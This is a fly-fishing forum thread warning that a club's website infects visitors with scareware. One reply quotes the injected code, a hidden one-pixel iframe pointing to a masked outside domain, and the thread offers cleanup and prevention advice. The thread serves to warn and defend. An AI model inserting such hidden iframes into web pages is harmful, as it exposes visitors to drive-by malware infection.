NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

DennisE

Topwater and tying.
#1
I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to iradicate this "Scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today) so they are still infected.
I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
 

Flyborg

Active Member
#2
It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

Code:
<iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
(I blocked out the actual URL)

Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
 

Flyborg

Active Member
#4
Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially wordpress!).
 
#8
It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

Code:
<iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
(I blocked out the actual URL)

Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
Changing the FTP credentials might not help much. IFRAME malware most like occurs from SQL injection... sloppy coding, in other words.

If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

Sanitize those Database queries or people talk about you on forums like this.